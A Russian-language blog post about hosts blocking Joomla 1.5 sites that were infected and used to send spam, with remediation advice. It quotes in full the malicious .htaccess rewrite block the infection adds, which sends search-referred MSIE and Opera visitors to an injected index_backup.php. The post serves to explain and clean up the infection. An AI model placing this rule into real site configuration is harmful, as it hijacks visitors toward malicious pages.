Блокировка хостинга за рассылку спама

Блокировка хостинга за рассылку спама
Блокировка хостинга за рассылку спама

Владельцы сайтов на Joomla 1.5, стали сталкиваться с проблемой блокировки хостинга со стороны хостинг-провайдеров. Причина блокировки площадок объясняется тем, что с сайтов рассылается спам. При проверке хостинга при помощи антивирусной программа на основе ClamAV (запускается из панели cPanel), она находит троянцев. После удаления троянцев, вирусы появляются снова, буквально через несколько часов.

По мнению многих пользователей, заражение происходит из-за уязвимостей в визуальном редакторе JCE для Joomla 1.5. После заражения,  в файл .htaccess дописывается следующий текст:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|

hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|

twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|

amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|

thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|

clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|

suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|

sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|

freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|

hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|

sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|

findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|

searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|

bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|

kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|

allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>

Во многие папку дописывается файл index_backup.php. К сожалению, ручное удаление файлов, содержащих вредоносный код, не дает желаемого результата. Скорее всего, проблему могло бы решить обновление Joomla, но поскольку поддержки Joomla 1.5 уже нет, необходимо мигрировать на новые версии движка — Joomla 2.5 или J00mla 3.0.

Заражаются ли сайты на WordPress?

Многие пользователи знают, что соседство сайтов работающих на разных движках, не есть хорошо. Хорошим тому доказательством является то, что  вирусом заражаются и сайты работающие на WordPress. Сценарий схож: модификация файлов .htaccess и появление файлов index_backup.php.

Если с хостинга удалить сайты работающие на Joomla, то антивирусная программа на основе ClamAV не находит вирусов, даже при наличии модифицированных фалов .htaccess и «левых» файлов index_backup.php. При проверке бекапа, Kaspersky Internet Security 2013, ничего подозрительного не находит. Однако сайты WordPress получают «черную метку» от Яндекса.

Сообщение: "Сайт может угрожать безопасности вашего компьютера"

Что можно предпринять при заражении сайтов?

Если на одной хостинговой площадке размещены сайта на различных движках, сразу необходимо подумать о покупке дополнительного хостинга. После покупки нового хостинга, я бы рекомендовал перенести на него сайта работающие на WordPress, причем движок и плагины следует установить с нуля, для исключения нового заражения.

Что касается сайтов на Joomla, то необходимо думать о миграции на новые версии движка, иначе, нет никаких гарантий касающихся новых заражений.

Дополнительно к этому материалу, прочтите статью Как проверить сайт на вирусы онлайн.

1 комментарий

Оставить комментарий

Ваш электронный адрес не будет опубликован.


*